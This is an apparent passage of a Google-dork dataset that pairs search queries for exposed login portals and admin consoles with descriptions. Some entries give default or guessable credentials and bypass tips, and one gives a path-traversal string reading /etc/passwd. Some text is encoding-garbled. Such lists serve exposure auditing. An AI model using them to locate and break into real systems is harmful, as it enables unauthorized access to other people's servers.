\n-Xploit"}, {"dork": "inurl:/oam/server/obrareq.cgi | ext:\"encquery\" | ext:\"Portal_Webcenter\"", "description": "Login's for Oracle Access Management\n-Xploit"}, {"dork": "intitle:\"Welcome | PRTG Network Monitor\" inurl:/index.htm", "description": "Login screen for network monitoring system.\nAuthor: Manuel Mancera (@sinkmanu)"}, {"dork": "inurl:\"/,DanaInfo=\"", "description": "Yet another Remote Login Dork.\n-Xploit"}, {"dork": "intitle:\"VOOD - Welcome to Vood Residential Gateway >Login\"", "description": "Multiple VOOD Online Gateways!\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:index.php?app=main intitle:sms", "description": "login portals to playsms webapp\ndefault password admin:admin"}, {"dork": "filetype:pwd intitle:index", "description": "Google dork:\nfiletype:pwd intitle:index\nD0bby"}, {"dork": "inurl:citrix inurl:login.asp -site:citrix.com", "description": "Citrix Login Portals\ninurl:citrix inurl:login.asp -site:citrix.com"}, {"dork": "Zixmail inurl:/s/login?", "description": "Zixmail Secure Email Logon Portals.\n-Xploit"}, {"dork": "inurl:\"/login/login.html\" intitle:\"Greenbone Security Assistant\"", "description": "OpenVAS login page,\nby neon"}, {"dork": "inurl:\"/sgdadmin/\" Secure Global Desktop", "description": "Oracle Secure Global Desktop Console and Administrator Help.\n\"https://sgd\""}, {"dork": "inurl:/?skipANDROID=true intext:\"Pydio Community\"", "description": "Pydio Community, Cloud and Secure FTP server logins.\n-Xploit"}, {"dork": "\"This WebUI administration tool requires scripting support\" intitle:'Login' intext:'Admin Name:' -score", "description": "Pages containing Login Portals\nJuniper Netscreen WebUI login page."}, {"dork": "inurl:forgot.do;jsessionid=", "description": "Forgot password portals\n- Matt - twitter.com/novpn"}, {"dork": "inurl:\".Admin;-aspx }\" \"~Login\"", "description": "Admin Logins\n-Xploit"}, {"dork": "\"Joomla! Administration Login\" inurl:\"/index.php\"", "description": "Finds Joomla admin login pages\nDxtroyer"}, {"dork": "-english -help -printing -companies -archive -wizard -pastebin -adult -keywords \"Warning: this page requires Javascript. To correctly view, please enable it in your browser\"", "description": "this one is for fortinet firewalls login web based . thanks #th3jackers"}, {"dork": "inurl:\"member.php?action=login\"", "description": "Finds logins powered by MyBB\nDxtroyer"}, {"dork": "\"Log in\" \"Magento is a trademark of Magento Inc.\"", "description": "Finds Magento admin logins\nDxtroyer"}, {"dork": "inurl:\"/siteadmin/index.php\"", "description": "Finds admin control panels\nDxtroyer"}, {"dork": "inurl:\"http://webmail.\"", "description": "Finds various webmail servers.\nDxtroyer"}, {"dork": "intitle:\"Dell SonicWALL - Authentication\"", "description": "Finds tons upon tons of Dell SonicWALL firewall servers\nDxtroyer"}, {"dork": "inurl:\"Login;jsessionid=\"", "description": "Finds generic JS login portals\nDxtroyer"}, {"dork": "intitle:\"Sign in \u00b7 GitLab\"", "description": "Dork: intitle:\"Sign in \u00b7 GitLab\"\nDescription: Find GitLab servers\nAuthor: scumsec"}, {"dork": "intitle:\"Plesk Onyx\" intext:\"Interface language\"", "description": "Dork: intitle:\"Plesk Onyx\" intext:\"Interface language\"\nDescription: Find Plesk Onyx login pages\nAuthor: scumsec"}, {"dork": "inurl:/remote/login?lang=en", "description": "Find FortiGate Firewall's SSL-VPN login portal.\nonce you connected with VPN you will get LAN access.\nif you are lucky try\nuser = test\npass = test@123\nDagalti Kick"}, {"dork": "inurl:index of= %2F /admin login %2F intitle:\"Administration Login -", "description": "Admin Logins for different Web Hosting Companies.\nOther Dorks.\ninurl:index of= %2F /Admin Login %2F\ninurl:\"Admin/Index.aspx?\"\ninurl:\"Admin/Index.aspx?A=LogOut\"\n-Xploit"}, {"dork": "inurl:front/central.php", "description": "GLPI login screen. Default login:\n * glpi/glpi (super-admin)\n * tech/tech\n * postonly/postonly (only for helpdesk)\n * normal/normal\n--\n@verovan"}, {"dork": "intitle:\"Welcome to QNAP Turbo NAS\"", "description": "Login form and options for QNAP products\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar/"}, {"dork": "inurl:login/?next=/admin/ -https -stackoverflow.com -github.com", "description": "inurl:login/?next=/admin/ -https -stackoverflow.com -github.com\nfinds insecured admin logins and Django Admin logins.\nBy Ozzy"}, {"dork": "inurl:\":8006\" and intext:\"Proxmox VE Login\"", "description": "Login portal to Proxmox Virtual Environment.\n---\n@verovan"}, {"dork": "intext:\"Welcome to\" inurl:\"cp\" intitle:\"H-SPHERE\" inurl:\"begin.html\" -Fee", "description": "This gives results for hosting plans that don't have associated fees, so anyone can sign up with false information and no credit card details"}, {"dork": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "description": "[quote]Cisco CallManagerCallManager is a FREE web application/interface included with your VoIP telephone service. It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.Voice over IP telephone users \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201cLogon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp* User ID \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c your UWYO Domain username* Password \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u201c initial password is 12341234Please create your own unique password after your initial logon[/quote]There are several vulnerbilities for CallManager"}, {"dork": "(intitle:\"SilkyMail by Cyrusoft International, Inc", "description": "silkyMail is a free internet email client, from www.cyrusoft.com, that runs in your browser. The server can work with apache or as a stand alone email server.The google query and url got cut off, it should really be:(intitle:\"SilkyMail by Cyrusoft International, Inc.\")|(intitle:\"Welcome to SilkyMail\")|(intitle:\"Willkommen bei SilkyMail\")|(inurl:adv_login.php3)|(inurl:\"silkymail/imp/login.php3\")http://www.google.com/search?num=100&hl=en&lr=&safe=off&q=%28intitle%3A%22SilkyMail+by+Cyrusoft+International%2C+Inc.%22%29%7C%28intitle%3A%22Welcome+to+SilkyMail%22%29%7C%28intitle%3A%22Willkommen+bei+SilkyMail%22%29%7C%28inurl%3Aadv_login.php3%29%7C%28inurl%3A%22silkymail%2Fimp%2Flogin.php3%22%29&btnG=Search"}, {"dork": "inurl:\"/jenkins/login\" \"Page generated\"", "description": "Finds login pages for Jenkins continuous integration servers.\n- Andy G - twitter.com/vxhex"}, {"dork": "Auth inurl:welcome ext:cgi", "description": "A lot of Pages with logins portals.\nEnjoy.\nBy Rootkit."}, {"dork": "inurl:/WebInterface/login.html", "description": "Login Pages for CrushFTP\nMay bring up other programs FTP pages."}, {"dork": "allinurl:\"exchange/logon.asp\"", "description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad."}, {"dork": "intitle:\"ColdFusion Administrator Login\"", "description": "This is the default login page for ColdFusion administration. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server."}, {"dork": "inurl:login.cfm", "description": "This is the default login page for ColdFusion. Although many of these are secured, this is an indicator of a default installation, and may be inherantly insecure. In addition, this search provides good information about the version of ColdFusion as well as the fact that ColdFusion is installed on the server."}, {"dork": "inurl:\":10000\" intext:webmin", "description": "Webmin is a html admin interface for Unix boxes. It is run on a proprietary web server listening on the default port of 10000."}, {"dork": "inurl:login.asp", "description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention."}, {"dork": "inurl:/admin/login.asp", "description": "This is a typical login page. It has recently become a target for SQL injection. Comsec's article at http://www.governmentsecurity.org/articles/SQLinjectionBasicTutorial.php brought this to my attention."}, {"dork": "\"VNC Desktop\" inurl:5800", "description": "VNC is a remote-controlled desktop product. Depending on the configuration, remote users may not be presented with a password. Even when presented with a password, the mere existance of VNC can be important to an attacker, as is the open port of 5800."}, {"dork": "intitle:Remote.Desktop.Web.Connection inurl:tsweb", "description": "This is the login page for Microsoft's Remote Desktop Web Connection, which allows remote users to connect to (and optionally control) a user's desktop. Although authentication is built into this product, it is still possible to run this service without authentication. Regardless, this search serves as a footprinting mechanisms for an attacker."}, {"dork": "inurl:names.nsf?opendatabase", "description": "A Login portal for Lotus Domino servers. Attackers can attack this page or use it to gather information about the server."}, {"dork": "inurl:/Citrix/Nfuse17/", "description": "These are Citrix Metaframe login portals. Attackers can use these to profile a site and can use insecure setups of this application to access the site."}, {"dork": "intitle:\"eMule *\" intitle:\"- Web Control Panel\" intext:\"Web Control Panel\" \"Enter your password here.\"", "description": "This iks the login page for eMule, the p2p file-sharing program. These pages forego the login name, prompting only for a password. Attackers can use this to profile a target, gather information and ultimately upload or download files from the target (which is a function of the emule program itself)"}, {"dork": "inurl:login filetype:swf swf", "description": "This search reveals sites which may be using Shockwave (Flash) as a login mechanism for a site. The usernames and passwords for this type of login mechanism are often stored in plaintext inside the source of the .swl file."}, {"dork": "\"please log in\"", "description": "This is a simple search for a login page. Attackers view login pages as the \"front door\" to a site, but the information about where this page is stored and how it is presented can provide clues about breaking into a site."}, {"dork": "inurl:/eprise/", "description": "silkRoad Eprise is a dynamic content management product that simplifies the flow of content to a corporate website. The software requires NT 4, Windows 2000 or Solaris and is used by high-profile corporations. If an attacker cuts the url after the eprise/ directory, he is presented with the admin logon screen."}, {"dork": "inurl:search/admin.php", "description": "phpMySearch is a personal search engine that one can use to provide a search feature for one's own Web site. With this search an attacker can find admin logon screens. This software does not seem to be very popular yet, but would allow attackers to access indexed information about the host if compromised."}, {"dork": "filetype:r2w r2w", "description": "WRQ Reflection gives you a standard desktop that includes web- and Windows-based terminal emulation and X Windows products. Terminal emulation settings are saved to a configuration file, depending on the version called r1w, r2w, or r4w. If an attacker loads these files he can access the main login screen on mainframe systems for example."}, {"dork": "intitle:\"Welcome Site/User Administrator\" \"Please select the language\" -demos", "description": "service providers worldwide use Ensim's products to automate the management of their hosting services. Currently it hosts more than 500,000 Web sites and five million mailboxes.Ensim's uses a control panel GUI to manage the servers. It has four levels of priviledges. The software runs on TCP port 19638, but access is normally limited to trusted hosts only. A local exploit was found by badc0ded.org in virthostmail, part of Ensim WEBppliance Pro."}, {"dork": "\"ttawlogin.cgi/?action=\"", "description": "Tarantella is a family of enterprise-class secure remote access software products. This Google-dork lists the login page for remote access to either the site server or another server within the target company. Tarantella also has a few security issues for a list of possible things that a malicous user could try to do, have a look at - http://www.tarantella.com/security/index.html An example of a malicous user could try is http://www.tarantella.com/security/bulletin-03.html the exploit isn't included in the User-Notice, but I've worked it out to be something like install directory/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd"}, {"dork": "inurl:\"exchange/logon.asp\" OR intitle:\"Microsoft Outlook Web Access - Logon\"", "description": "According to Microsoft \"Microsoft (R) Outlook (TM) Web Access is a Microsoft Exchange Active Server Application that gives you private access to your Microsoft Outlook or Microsoft Exchange personal e-mail account so that you can view your Inbox from any Web Browser. It also allows you to view Exchange server public folders and the Address Book from the World Wide Web. Anyone can post messages anonymously to public folders or search for users in the Address Book. \" Now, consider for a moment and you will understand why this could be potentially bad."}, {"dork": "filetype:cgi inurl:\"irc.cgi\" | intitle:\"CGI:IRC Login\"", "description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else."}, {"dork": "filetype:php login (intitle:phpWebMail|WebMail)", "description": "PhpWebMail is a php webmail system that supports imap or pop3. It has been reported that PHPwebmail 2.3 is vulnerable. The vulnerability allows phpwebmail users to gain access to arbitrary file system by changing the parameters in the URL used for sending mail (send_mail.php). More info at http://eagle.kecapi.com/sec/fd/phpwebmail.html."}, {"dork": "+\"Powered by INDEXU\" inurl:(browse|top_rated|power", "description": "From the sales department: \"INDEXU is a portal solution software that allows you to build powerful Web Indexing Sites such as yahoo.com, google.com, and dmoz.org with ease. It's ability to allow you and your members to easily add, organize, and manage your links makes INDEXU the first choice of all webmasters.\"(Moderator note: don't believe the marketing talk..)Some of these servers are not protected well enough. It has been reported that on (rare) occosions this page ->http://[indexu server]/recovery_tools/create_admin_user.phpindicates admin login is possible by the appearance of three text lines:Create Administrator LoginDelete old administrator user ....okCreate new administrator user ....okAn attacker can then change the URL tohttp://[target]/admin/index.php and enter:user=adminpass=adminBut that's if you find them.."}, {"dork": "ASP.login_aspx \"ASP.NET_SessionId\"", "description": ".NET based login pages serving the whole environment and process trace for your viewing pleasure.. These are often found on test servers, just before going online to the general public I guess. If the current page has no debugging information any longer, an attacker could still look at Google's cached version."}, {"dork": "inurl:\"utilities/TreeView.asp\"", "description": "From the marketing brochure: \"UltiPro Workforce Management offers you the most comprehensive and cost-effective HR and payroll solution on the market today.\"The default passwords are easy to guess if an employee has not logged into this system. An attacker would only need to find the loginname."}, {"dork": "intitle:Node.List Win32.Version.3.11", "description": "synchronet Bulletin Board System Software is a free software package that can turn your personal computer into your own custom online service supporting multiple simultaneous users with hierarchical message and file areas, multi-user chat, and the ever-popular BBS door games.An attacker could use this search to find hosts with telnet access. In some cases the username may even be visible on the node list page, thus leaving only the password to guess."}, {"dork": "(inurl:\"ars/cgi-bin/arweb?O=0\" | inurl:arweb.jsp)", "description": "From the vendor site: \"Remedy\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s Action Request System\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae is for automating Service Management business processes. More than 7,000 customers know that AR System is the way to automate key business processes. AR System includes tools for application-to-application integration, including support for Web Services that requires no additional programming.\"Login is often 'guest' with no password. Or no login is required. An attacker can search the database for sensitive info (passwords), and search profiles to obtain usernames, emails."}, {"dork": "intitle:\"teamspeak server-administration", "description": "TeamSpeak is an application which allows its users to talk to each other over the internet and basically was designed to run in the background of online games. TeamSpeak uses a webadmin login portal to change server settings remotely. Usually not an issue, however it might be when someone lets google pick up their portal."}, {"dork": "\"WebSTAR Mail - Please Log In\"", "description": "@stake, Inc. advisory: \"4D WebSTAR is a software product that provides Web, FTP, and Mail services for Mac OS X. There are numerous vulnerabilities that allow for an attacker to escalate privileges or obtain access to protected resources.\"See also: http://www.securityfocus.com/archive/1/368778"}, {"dork": "inurl:cgi-bin/ultimatebb.cgi?ubb=login", "description": "These are login pages for Infopop's message board UBB.classic. For the UBB.threads you can use this search This next search finds all UBB pages with the infopop image and a link to the developers.http://www.google.com/search?num=100&&safe=off&q=link%3Ahttp%3A%2F%2Fwww.infopop.com%2Flanding%2Fgoto.php%3Fa%3Dubb.classic&filter=1"}, {"dork": "\"powered by CuteNews\" \"2003..2005 CutePHP\"", "description": "This finds sites powered by various CuteNews versions. An attacker use this list and search the online advisories for vulnerabilities. For example: \"CuteNews HTML Injection Vulnerability Via Commentaries\", Vulnerable Systems: * CuteNews version 1.3.x (http://www.securiteam.com/unixfocus/5BP0N20DFA.html)"}, {"dork": "Novell NetWare intext:\"netware management portal version\"", "description": "Netware servers ( v5 and up ) use a web-based management utility called Portal services, which can be used to view files on a volume, view server health statistics, etc. While you must log into the Portal Manager to view any of the data, it will accept blank passwords. So any Netware username defined in the server's NDS database w/o a password can authenticate.After the Google results are displayed, an attacker wil go to the company base web url and learn about employees, preferably their email addresses. Then bounce to the portal management login and try their username w/o a password."}, {"dork": "Login (\"Powered by Jetbox One CMS \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2\" | \"Powered by Jetstream \u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 *\")", "description": "Jetbox is a content management systems (CMS) that uses MySQL or equivalent databases. There is a vulnerability report at SF wich I think is overrated, but I will mention here:http://www.securityfocus.com/bid/10858/discussion/The file holding the password is called: \"http://.../includes/general_settings.inc.php\"It does come with default passwords and that is allways a security risk. The administration is available via /admin/Username: admin, Password: admin1 ."}, {"dork": "intitle:Login * Webmailer", "description": "1&1 Webmail login portals. This is made by a german company called Internet United active in the hosting providers area. They have a server login product wich can be found by GooglingThis is all not very exiting as there have been no vulnerabilities reported on this software yet."}, {"dork": "inurl:\"gs/adminlogin.aspx\"", "description": "GradeSpeed seems to be a .NET application to administer school results for several schools using the web. If you do not select a school an error is reported. The HTML source code shows path information, for example: option value=\"E:\\GRADESPEED\\DRHARMONWKELLEYELEMENTARY\\|Dr H. W K. E.|101\">Dr ..."}, {"dork": "\"4images Administration Control Panel\"", "description": "4images Gallery - 4images is a web-based image gallery management system. The 4images administration control panel let you easily modify your galleries."}, {"dork": "intitle:\"TUTOS Login\"", "description": "TUTOS stands for \"The Ultimate Team Organization Software.\" This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now."}, {"dork": "\"Login to Usermin\" inurl:20000", "description": "Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators."}, {"dork": "intitle:\"Login - powered by Easy File Sharing Web", "description": "Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)\". More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly."}, {"dork": "intitle:\"Tomcat Server Administration\"", "description": "This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server."}, {"dork": "Admin intitle:\"eZ publish administration\"", "description": "Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:\"eZ publish administration\"intitle:\"Login\" \"Welcome to eZ publish administration\"Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions"}, {"dork": "inurl:administrator \"welcome to mambo\"", "description": "Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.Vendor: http://www.mamboserver.com/Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc"}, {"dork": "inurl:\"typo3/index.php?u=\" -demo", "description": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.Vendor: http://www.typo3.com/Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc"}, {"dork": "uploadpics.php?did= -forum", "description": "What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!"}, {"dork": "inurl:mewebmail", "description": "MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker."}, {"dork": "intitle:\"microsoft certificate services\" inurl:certsrv", "description": "Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as \"proof\" that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such."}, {"dork": "intitle:\"oMail-admin Administration - Login\" -inurl:omnis.ch", "description": "oMail-webmail is a Webmail solution for mail servers based on qmail and optionally vmailmgr or vpopmail. The mail is read directly from maildirs on the hard disk, which is much quicker than using protocols like POP3 or IMAP. Other features includes multiple language support (English, French, German, Japanese, Chinese, and many more), HTML and pictures inline display, folders, and address book support."}, {"dork": "intitle:\"MailMan Login\"", "description": "MailMan is a product by Endymion corporation that provides a web based interface to email via POP3 and SMTP. MailMan is very popular due to its amazingly easy setup and operation. MailMan is written as a Perl CGI script, the version that is shipped to customers is obfuscated in an attempt to prevent piracy. The code contains several insecure calls to open() containing user specified data. These calls can be used to execute commands on the remote server with the permissions of the user that runs CGI scripts, usually the web server user that is in most cases 'nobody'."}, {"dork": "inurl:default.asp intitle:\"WebCommander\"", "description": "Polycom WebCommander gives you control over all aspects of setting up conferences on Polycom MGC MCUs. With Polycom WebCommander, scheduling and launching multipoint conferences, ad hoc meetings or future conferences is an easy, productive way to schedule meetings."}, {"dork": "intitle:\"Philex 0.2*\" -script -site:freelists.org", "description": "Philex (phile 'file' explorer) is a web content manager based php what philex can do ? - easy navigation with tree structure - create, delete, rename, copy and move folders/files. - download files (normal or compressed :zip, gz, bz ). - download many files as one compressed file. - send files by email. - upload local files to server"}, {"dork": "\"WebExplorer Server - Login\" \"Welcome to WebExplorer Server\"", "description": "WebExplorer Server is a web-based file management system for sharing files with user permissions and quota limits. It features easy user interface and online administration which will allow you to manage users/groups/permissions without the need of server configuration knowledge. It can be used for remote file storage(eg FreeDrive)/hosting services, Companies/Educational institutions that need to share documents among people."}, {"dork": "intitle:\"remote assessment\" OpenAanval Console", "description": "The Aanval Intrusion Detection Console is an advanced intrusion detection monitor and alerting system. Currently supporting modules for Snort and syslog - Aanval provides real-time monitoring, reporting, alerting and stability. Aanval's web-browser interface provides real-time event viewing and system/sensor management."}, {"dork": "\"IMail Server Web Messaging\" intitle:login", "description": "IMail Server from Ipswitch is a messaging solution with 60 million users worldwide. It contains the features and safeguards you need without the complexity of expensive solutions like Microsoft Exchange\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae or groupware which challenges even the most experienced administrators.This is a login portal search. Security Focus shows a list of vulnerabilities about this software."}, {"dork": "inurl:\"calendar.asp?action=login\"", "description": "aspWebCalendar is a browser based software package that runs over a standard web browser, such as Internet Explorer from Microsoft, and allows an organization of any size to easily and cost effectively provide personal and group calendar functions to everyone in the organization.A vulnerability has been found for the (SQL version) script family from Full Revolution. Affected software is: aspWebAlbum, aspWebCalendar, aspWebHeadlines, aspWebMail. You can check it here: http://www.securityfocus.com/bid/11246Searches for aspWebAlbum and aspWebHeadlines:inurl:\"album.asp?action=login\"inurl:\"news.asp?action=login\""}, {"dork": "inurl:confixx inurl:login|anmeldung", "description": "Confixx is a webhosting management tool and has the following features: * create resellers, * edit personal data, * manage newsletters to resellers, * comprehensive stats, * powerful evaluation of traffic, * manage e-mail templates, * lock resellers. security focus has a vulnerability report on this.vendor: http://www.sw-soft.com/en/products/confixx/"}, {"dork": "\"VHCS Pro ver\" -demo", "description": "VHCS is professional Control Panel Software for Shared, Reseller, vServer and Dedicated Servers.No vulnerabilities are reported to security focus."}, {"dork": "\"SysCP - login\"", "description": "sysCP: Open Source server management tool for Debian LinuxNo vulnerabilities are reported to security focus."}, {"dork": "intitle:\"ISPMan : Unauthorized Access prohibited\"", "description": "ISPMan is a distributed system to manage components of ISP from a central management interface.No vulnerabilities are reported to security focus."}, {"dork": "\"Login - Sun Cobalt RaQ\"", "description": "The famous Sun linux appliance. Nice clean portal search.Various vulnerabilities are reported to security focus."}, {"dork": "intitle:plesk inurl:login.php3", "description": "Plesk is server management software developed for the Hosting Service Industry. Various vulnerabilities are reported to security focus."}, {"dork": "inurl:/dana-na/auth/welcome.html", "description": "Neoteris Instant Virtual Extranet (IVE) has been reported prone to a cross-site scripting vulnerability.The issue presents itself, due to a lack of sufficient sanitization performed on an argument passed to an IVE CGI script. An attacker may exploit this vulnerability to hijack valid Neoteris IVE sessions.advisories: http://secunia.com/product/1558/http://www.securityfocus.com/bid/7510"}, {"dork": "inurl:login.php \"SquirrelMail version\"", "description": "squirrelMail is a standards-based webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript required) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. SquirrelMail has all the functionality you would want from an email client, including strong MIME support, address books, and folder manipulation."}, {"dork": "intitle:\"php icalendar administration\" -site:sourceforge.net", "description": "PHP iCalendar is a php-based iCal file parser. Its based on v2.0 of the IETF spec. It displays iCal files in a nice logical, clean manner with day, week, month, and year navigation.This reveals the administration interface."}, {"dork": "intitle:\"php icalendar administration\" -site:sourceforge.net", "description": "This is the adminstration login portal search for PHP iCalendar. It is compatible with Evolution and clients for other platforms. Admin uuthentication has two choices, FTP and Internal. For the latter the defaults are \"admin/admin\".There is also a more generic search in the GHDB that an attacker use and then modify to ../admin.php to reach the adminstration pages. Access to adminstration allows an attacker to upload new ICS files or delete present ones."}, {"dork": "inurl:irc filetype:cgi cgi:irc", "description": "CGIIRC is a web-based IRC client. Using a non-transparent proxy an attacker could communicate anonymously by sending direct messages to a contact. Most servers are restricted to one irc server and one or more default channels and will not let allow access to anything else."}, {"dork": "intext:\"Icecast Administration Admin Page\" intitle:\"Icecast Administration Admin Page\"", "description": "Icecast streaming audio server web admin.This gives you a list of connected clients. Interesting way of finding attackable client computers."}, {"dork": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "description": "Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial!"}, {"dork": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download & upload manager\". This is a search for the login pages."}, {"dork": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "description": "These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. \"As part of the IBM TotalStorage\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage.\""}, {"dork": "intitle:\"VitalQIP IP Management System\"", "description": "The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements. Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html"}, {"dork": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "description": "vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks."}, {"dork": "inurl:\"1220/parse_xml.cgi?\"", "description": "Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more. Darwin Streaming Server is the opensource version (for *NUX os's).Some are pass protected, others not."}, {"dork": "intitle:\"MX Control Console\" \"If you can't remember\"", "description": "MX Logic\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2s customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies."}, {"dork": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "description": "BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business."}, {"dork": "inurl:1810 \"Oracle Enterprise Manager\"", "description": "Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box."}, {"dork": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "description": "\"Novell\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web browser anywhere you have an Internet connection; and even on wireless devices. Your GroupWise system can be set up on NetWare\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, Linux, Windows, or any combination of these operating systems.\""}, {"dork": "intitle:\"Athens Authentication Point\"", "description": "Athens is an Access Management system for controlling access to web based subscription services. It offers: * secure single username access to multiple web-based access controlled services * devolved 